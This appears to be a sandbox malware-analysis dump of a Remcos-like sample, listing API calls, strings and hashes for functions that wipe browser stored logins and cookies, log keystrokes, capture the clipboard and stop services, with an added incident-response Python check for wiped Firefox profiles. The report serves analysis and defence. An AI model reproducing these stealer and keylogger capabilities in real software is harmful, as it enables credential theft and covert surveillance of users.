                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Find$Close$File$FirstNext
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 3527384056-432212279
                                        • Opcode ID: afbc07ee94dc55de29737b8265fc2946ce16348eb2e6c3375388058535cb7faa
                                        • Instruction ID: dbd9f6267a9c4e7c3902c4a226f6ac573d7215c68fbf89995bcc59ae7ea0ce63
                                        • Opcode Fuzzy Hash: afbc07ee94dc55de29737b8265fc2946ce16348eb2e6c3375388058535cb7faa
                                        • Instruction Fuzzy Hash: 77416C71A01219ABEF14FBB0DD55AEEB778EF11218F80055EE402A71C1FF647E86CA91
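The two functions above walk <UserProfile>\AppData\Roaming\Mozilla\Firefox\Profiles\ and report "[Firefox StoredLogins Cleared!]" and "[Firefox cookies found, cleared!]" after clearing logins.json, key3.db and cookies.sqlite. The Python below is an added incident-response check written for this page, not code from the report or from Remcos: it lists, per profile, which of those three files are missing and flags profiles that have been used (they contain other files) but lack one of them. The fixture tree, the profile names and the prefs.js marker file are constructed so the example runs offline; the "used profile" heuristic is this example's own. Current Firefox releases keep the key database in key4.db, which the sample's strings do not mention; the encrypted logins themselves live in logins.json, so deleting that file is what removes the saved passwords.

```python
r"""Added example for incident response, not code from the report or from Remcos.
The sample's strings name <UserProfile>\AppData\Roaming\Mozilla\Firefox\Profiles\ and
the files logins.json, key3.db and cookies.sqlite. This check reports, per profile,
which of those files are missing and flags used profiles that lack any of them.
The fixture tree is constructed here so the example runs offline."""
from __future__ import annotations
from pathlib import Path
import tempfile

PROFILES_SUBDIR = Path("AppData/Roaming/Mozilla/Firefox/Profiles")
STORE_FILES = ("logins.json", "key3.db", "cookies.sqlite")  # names from the sample's strings


def profile_store_status(user_profile: str | Path) -> dict[str, dict[str, bool]]:
    """Per profile directory: which store files exist (profiles are listed in name order)."""
    root = Path(user_profile) / PROFILES_SUBDIR
    if not root.is_dir():
        return {}
    return {p.name: {f: (p / f).is_file() for f in STORE_FILES}
            for p in sorted(root.iterdir()) if p.is_dir()}


def suspect_profiles(user_profile: str | Path) -> list[str]:
    """Used profiles (they contain other files, e.g. prefs.js) that miss a store file.

    Heuristic, this example's own: an empty profile directory is not interesting, and
    absence alone is not proof of wiping, since a profile that never saved a password
    has no logins.json. Confirm against a backup or a volume shadow copy.
    """
    base = Path(user_profile) / PROFILES_SUBDIR
    flagged = []
    for name, files in profile_store_status(user_profile).items():
        used = any(c.is_file() and c.name not in STORE_FILES for c in (base / name).iterdir())
        if used and not all(files.values()):
            flagged.append(name)
    return flagged


def build_fixture(root: Path) -> Path:
    """Constructed tree: one intact profile, one with the stores removed, one empty dir."""
    base = root / PROFILES_SUBDIR
    intact, wiped, empty = (base / n for n in
                            ("a1b2c3d4.default-release", "e5f6a7b8.default", "00000000.empty"))
    for prof in (intact, wiped, empty):
        prof.mkdir(parents=True)
    for prof in (intact, wiped):
        (prof / "prefs.js").write_text("// constructed placeholder\n")
    for f in STORE_FILES:
        (intact / f).write_bytes(b"")
    return root


def demo() -> tuple[dict[str, dict[str, bool]], list[str]]:
    """Build the fixture in a temporary directory and run both checks on it."""
    with tempfile.TemporaryDirectory() as tmp:
        home = build_fixture(Path(tmp))
        return profile_store_status(home), suspect_profiles(home)


if __name__ == "__main__":
    status, flagged = demo()
    for name, files in status.items():
        print(name, {f: "present" if ok else "MISSING" for f, ok in files.items()})
    print("suspect profiles:", flagged)
```

On a live host, point profile_store_status at the user's profile directory (the value of the UserProfile environment variable the sample reads) rather than at the fixture; run it against a known-good backup of the same profile to turn "missing" into "deleted".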
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A076
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A0A6
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A118
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A125
                                          • Part of subcall function 04A9A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A0FB
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A146
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A15C
                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A163
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A16C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                        • String ID: 05#v`#v$pth_unenc
                                        • API String ID: 2341273852-1557463602
                                        • Opcode ID: 3474a3e9f063ab655633c88f77b698be669cab0ffb685ac142d0bff5dbc351be
                                        • Instruction ID: f7d9f650dda6a6ec1385afb6ffe4a371b768d806b5f7f765214f6fbd073c654c
                                        • Opcode Fuzzy Hash: 3474a3e9f063ab655633c88f77b698be669cab0ffb685ac142d0bff5dbc351be
                                        • Instruction Fuzzy Hash: 5F31A77190621C6ADF20EBA0EC48EDB77FCEF14204F5406A6E555D2051EB35AEC58B60
                                        APIs
                                        • OpenClipboard.USER32 ref: 04A94EC2
                                        • EmptyClipboard.USER32 ref: 04A94ED0
                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 04A94EF0
                                        • GlobalLock.KERNEL32(00000000), ref: 04A94EF9
                                        • GlobalUnlock.KERNEL32(00000000), ref: 04A94F2F
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 04A94F38
                                        • CloseClipboard.USER32 ref: 04A94F55
                                        • OpenClipboard.USER32 ref: 04A94F5C
                                        • GetClipboardData.USER32(0000000D), ref: 04A94F6C
                                        • GlobalLock.KERNEL32(00000000), ref: 04A94F75
                                        • GlobalUnlock.KERNEL32(00000000), ref: 04A94F7E
                                        • CloseClipboard.USER32 ref: 04A94F84
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                        • String ID:
                                        • API String ID: 3520204547-0
                                        • Opcode ID: a59d9e9b64f8adc78932f9eec87928694bb3d29629e561ea007e4e6c7d31b258
                                        • Instruction ID: cdccffc1678ec148341d9d7ca1811a999eb8405098d66432d2af6d207314b033
                                        • Opcode Fuzzy Hash: a59d9e9b64f8adc78932f9eec87928694bb3d29629e561ea007e4e6c7d31b258
                                        • Instruction Fuzzy Hash: 412186726052009BE714BBB0DD59ABF77F8EFA4605F44081EF54782181EF38AC0BCA62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0$1$2$3$4$5$6$7
                                        • API String ID: 0-3177665633
                                        • Opcode ID: a7618f23893a7341128b06d42b6ca415c45b62da74cceee85112358df2b69ba3
                                        • Instruction ID: a6d89101173e88cd682a7b4376fdb07c6aff237b01c481ea3452d418373d5696
                                        • Opcode Fuzzy Hash: a7618f23893a7341128b06d42b6ca415c45b62da74cceee85112358df2b69ba3
                                        • Instruction Fuzzy Hash: 9461A474919301AEEB04FF20D9A0FAA77E4DF85714F00490DF992572D0EA70BE89D7A2
                                        APIs
                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,04AF27F8), ref: 04A98714
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 04A98763
                                        • GetLastError.KERNEL32 ref: 04A98771
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 04A987A9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                        • String ID:
                                        • API String ID: 3587775597-0
                                        • Opcode ID: 8417885e5e469ab238b0615e520e330d82f472111db7ad933c07a4f93bdf3b1b
                                        • Instruction ID: 8d0bcc6a6a3c3697cd47254f9308f87daf86e42dd80ee5c7dddf2b75086f7251
                                        • Opcode Fuzzy Hash: 8417885e5e469ab238b0615e520e330d82f472111db7ad933c07a4f93bdf3b1b
                                        • Instruction Fuzzy Hash: 4D813AB1108344ABE704FB61D980DAFB7ECFFA4608F50491EF59646150EF74BA0ACB92
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98AD2
                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98AE9
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98AF6
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98B05
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98B16
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98B19
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: da1a035498c94c56d6e20f6bbd15a8882673504619749515051872513fcf5bb4
                                        • Instruction ID: 8a72cf39657eece5a9d935c5d6e4e82e368f831331aa5ddc268f41893d0d9826
                                        • Opcode Fuzzy Hash: da1a035498c94c56d6e20f6bbd15a8882673504619749515051872513fcf5bb4
                                        • Instruction Fuzzy Hash: 5011E572A021186FAB10BB64DC89CBF3BBCDF566907004019FA06D2140DB6C6D079AB1
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 04A8B2DC
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 04A8B3AF
                                        • FindClose.KERNEL32(00000000), ref: 04A8B3BE
                                        • FindClose.KERNEL32(00000000), ref: 04A8B3E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 1164774033-405221262
                                        • Opcode ID: cac7b49a9ddf34aee8270c0d7ce1790e5c85c8153348c750c1e2bbe772793d32
                                        • Instruction ID: fc74be7c3c5aa6f22f6d3dc28f1bc20fe0e8e872e7368aa2410eae9e134eb7df
                                        • Opcode Fuzzy Hash: cac7b49a9ddf34aee8270c0d7ce1790e5c85c8153348c750c1e2bbe772793d32
                                        • Instruction Fuzzy Hash: 98319C71A00219ABEB14FBA0DE95DFE777CEF10718F00005EE416A2091EF74BA8ACB50
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 04A8935B
                                        • SetWindowsHookExA.USER32(0000000D,04A8932C,00000000), ref: 04A89369
                                        • GetLastError.KERNEL32 ref: 04A89375
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 04A893C3
                                        • TranslateMessage.USER32(?), ref: 04A893D2
                                        • DispatchMessageA.USER32(?), ref: 04A893DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                        • String ID: Keylogger initialization failure: error $`#v
                                        • API String ID: 3219506041-3226811161
                                        • Opcode ID: 679844e78df2bc01bab967c170e5141a49568c15deca19d2cf6f9628edcaca1b
                                        • Instruction ID: 5d793a0f31ab4054b67f87ca793f0c00d76596c9b226a52b5e47c0ed56f10bc9
                                        • Opcode Fuzzy Hash: 679844e78df2bc01bab967c170e5141a49568c15deca19d2cf6f9628edcaca1b
                                        • Instruction Fuzzy Hash: 7A11A372A05201BBD7107BB59D098BB7BFCEBD5615B100A6DF8A2C2180EF34E902C7A1
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 04A929B8
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 04A929C4
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 04A92CBA
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A92CC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                        • API String ID: 2127411465-314212984
                                        • Opcode ID: 5616818d4a274ceea3df833dfceea57ae76bd65840899a1ed6d13ef59384d331
                                        • Instruction ID: a7d25079b819e33bcec574abedf2a40604f867a46648534a58d0bf46c5b69072
                                        • Opcode Fuzzy Hash: 5616818d4a274ceea3df833dfceea57ae76bd65840899a1ed6d13ef59384d331
                                        • Instruction Fuzzy Hash: A6E1D273A042007BFE18B7749E65EBE76E8EF91208F400A5DF542A71D1EE25BE058292
                                        APIs
                                        • _free.LIBCMT ref: 04AC6741
                                        • _free.LIBCMT ref: 04AC6765
                                        • _free.LIBCMT ref: 04AC68EC
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,04ADC1E4), ref: 04AC68FE
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,04AEF754,000000FF,00000000,0000003F,00000000,?,?), ref: 04AC6976
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,04AEF7A8,000000FF,?,0000003F,00000000,?), ref: 04AC69A3
                                        • _free.LIBCMT ref: 04AC6AB8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: a30ef47bc675234238153e3270c647f12b101c9f33c8d977e3924baee5d529dd
                                        • Instruction ID: 57192379a2da2e6ebb482f5c4dd0f158668cfe475ecba34151550599f47df8c3
                                        • Opcode Fuzzy Hash: a30ef47bc675234238153e3270c647f12b101c9f33c8d977e3924baee5d529dd
                                        • Instruction Fuzzy Hash: B7C139B1A00245AFEB60DF79C944BAE7BFCEF45314F18456ED4949B240E735AE42CB90
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 04A8A98F
                                        • GetLastError.KERNEL32 ref: 04A8A999
                                        Strings
                                        • [Chrome StoredLogins found, cleared!], xrefs: 04A8A9BF
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 04A8A95A
                                        • [Chrome StoredLogins not found], xrefs: 04A8A9B3
                                        • UserProfile, xrefs: 04A8A95F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 2018770650-1062637481
                                        • Opcode ID: 1997564d7124b7e638ab511f68f20007c441a8a1c73709f61bdb4b04e35e374c
                                        • Instruction ID: 6d14481eaa103b5f43e1e5303169747e9e6482819ea20c3143d24f50ea37a8cd
                                        • Opcode Fuzzy Hash: 1997564d7124b7e638ab511f68f20007c441a8a1c73709f61bdb4b04e35e374c
                                        • Instruction Fuzzy Hash: AD01D632A85104BB6B047BB5DD568BF7B28FB11604F80011FE41257291FE127D06CBD2
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 04A95C9D
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 04A95CA4
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04A95CB6
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04A95CD5
                                        • GetLastError.KERNEL32 ref: 04A95CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: 1183b2c5735c0608096ae3865af14481e92f31d9f1a158840e156d234e7d6dea
                                        • Instruction ID: e178dae50807cc7932b1207e8b2ec61c02991ab0317b852e571d31c05ac6ea44
                                        • Opcode Fuzzy Hash: 1183b2c5735c0608096ae3865af14481e92f31d9f1a158840e156d234e7d6dea
                                        • Instruction Fuzzy Hash: E4F0D4B5902129BBEB10ABA1ED4DEEFBFBCEF19215F108054F906A2140D6795E05CAB1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 04A88393
                                          • Part of subcall function 04A848A8: connect.WS2_32(?,?,?), ref: 04A848C0
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8842F
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 04A8848D
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 04A884E5
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 04A884FC
                                          • Part of subcall function 04A84E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,04AF1E90,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E18
                                          • Part of subcall function 04A84E06: SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E23
                                          • Part of subcall function 04A84E06: CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E2C
                                        • FindClose.KERNEL32(00000000), ref: 04A886F4
                                          • Part of subcall function 04A84A81: WaitForSingleObject.KERNEL32(?,00000000,04A845C6,?,?,00000004,?,?,00000004,04A8BE60,00000000,?), ref: 04A84B27
                                          • Part of subcall function 04A84A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,04A8BE60,00000000,?,?,?,?,?,?,04A845C6), ref: 04A84B55
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                        • String ID:
                                        • API String ID: 1824512719-0
                                        • Opcode ID: 170618353813f56010490296eb28ce374e6a0aaf5f192d692dbffca4c577df30
                                        • Instruction ID: ad455328c55436daa47c89347bd190c60d1bc1a4ff297795477dea31d588a03a
                                        • Opcode Fuzzy Hash: 170618353813f56010490296eb28ce374e6a0aaf5f192d692dbffca4c577df30
                                        • Instruction Fuzzy Hash: B6B18B72900109ABEB14FBA0DE91EEDB778EF14314F5042ADE516AB191EF347E49CB90
                                        APIs
                                          • Part of subcall function 04A90201: SetLastError.KERNEL32(0000000D,04A90781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A9075F), ref: 04A90207
                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A9075F), ref: 04A9079C
                                        • GetNativeSystemInfo.KERNEL32(?,04A8BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A9075F), ref: 04A9080A
                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 04A9082E
                                          • Part of subcall function 04A90708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,04A9084C,?,00000000,00003000,00000004,00000000,?,?), ref: 04A90718
                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 04A90875
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 04A9087C
                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A9098F
                                          • Part of subcall function 04A90ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,04A9099C,?,?,?,?,?), ref: 04A90B4C
                                          • Part of subcall function 04A90ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04A90B53
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                        • String ID:
                                        • API String ID: 3950776272-0
                                        • Opcode ID: 9b29e614a0546e2cb480fc0cd60e78c148e013d0b776dbe89ab6301b35e0bfa3
                                        • Instruction ID: 2e79055c62e76e10a08728355d079380f3afd6de7384e0f9cca6b87f6271765e
                                        • Opcode Fuzzy Hash: 9b29e614a0546e2cb480fc0cd60e78c148e013d0b776dbe89ab6301b35e0bfa3
                                        • Instruction Fuzzy Hash: 0E61D4B1309611ABEF509F25CD80B2A7BE9FF457A4F044118EA468B681EB74FC41CBD1
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,04A98344,00000000), ref: 04A98C3E
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,04A98344,00000000), ref: 04A98C52
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,04A98344,00000000), ref: 04A98C5F
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,04A98344,00000000), ref: 04A98C94
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,04A98344,00000000), ref: 04A98CA6
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,04A98344,00000000), ref: 04A98CA9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                        • String ID:
                                        • API String ID: 493672254-0
                                        • Opcode ID: c97756dd63db49bbcce76d003db89eba72b45d1bd9bc8ea281edfc0f7b53bd7a
                                        • Instruction ID: c026ebe89b1fb40120ed72fee41d6b852a4d676022e4adaaebd610c864ab558e
                                        • Opcode Fuzzy Hash: c97756dd63db49bbcce76d003db89eba72b45d1bd9bc8ea281edfc0f7b53bd7a
                                        • Instruction Fuzzy Hash: E901F5711961147AEA106B789D4EE7B3AECDB43270F04431DF527E61C0DA6CAE0A91A1
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 04A8949C
                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 04A894A7
                                        • GetKeyboardLayout.USER32(00000000), ref: 04A894AE
                                        • GetKeyState.USER32(00000010), ref: 04A894B8
                                        • GetKeyboardState.USER32(?), ref: 04A894C5
                                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 04A894E1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                        • String ID:
                                        • API String ID: 3566172867-0
                                        • Opcode ID: cd3c9cc5bde17242d785f2f36b7f7e8ae104c97d9a0deadcf51e0bd75d9b74df
                                        • Instruction ID: 0e448fcfabd0b7379b2485705979ee62efd4dd42bfcc9556ecdb9360b9c4534d
                                        • Opcode Fuzzy Hash: cd3c9cc5bde17242d785f2f36b7f7e8ae104c97d9a0deadcf51e0bd75d9b74df
                                        • Instruction Fuzzy Hash: B2111E7690120CABDB10DBE4ED49FDA7BBCEB1C705F100465F605E6180E679AE568BA0
                                        APIs
                                          • Part of subcall function 04A95C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 04A95C9D
                                          • Part of subcall function 04A95C90: OpenProcessToken.ADVAPI32(00000000), ref: 04A95CA4
                                          • Part of subcall function 04A95C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04A95CB6
                                          • Part of subcall function 04A95C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04A95CD5
                                          • Part of subcall function 04A95C90: GetLastError.KERNEL32 ref: 04A95CDB
                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 04A94E56
                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 04A94E6B
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A94E72
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                        • String ID: PowrProf.dll$SetSuspendState
                                        • API String ID: 1589313981-1420736420
                                        • Opcode ID: 3f7663d8af2fe500c3fc094c112efd94fc9efe8255b3280fc82fb34738acf2e4
                                        • Instruction ID: 17eb63ef8d7f8bcb9f50a2ac5223aedcb44eba3f5b045dd023710dc398947a10
                                        • Opcode Fuzzy Hash: 3f7663d8af2fe500c3fc094c112efd94fc9efe8255b3280fc82fb34738acf2e4
                                        • Instruction Fuzzy Hash: 352132B1B083056BFE14FBB19A95AFF63DDEF94209F40081DA6525B2C1EE25FC0A8751
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,04ACF93B,?,00000000), ref: 04ACF6B5
                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,04ACF93B,?,00000000), ref: 04ACF6DE
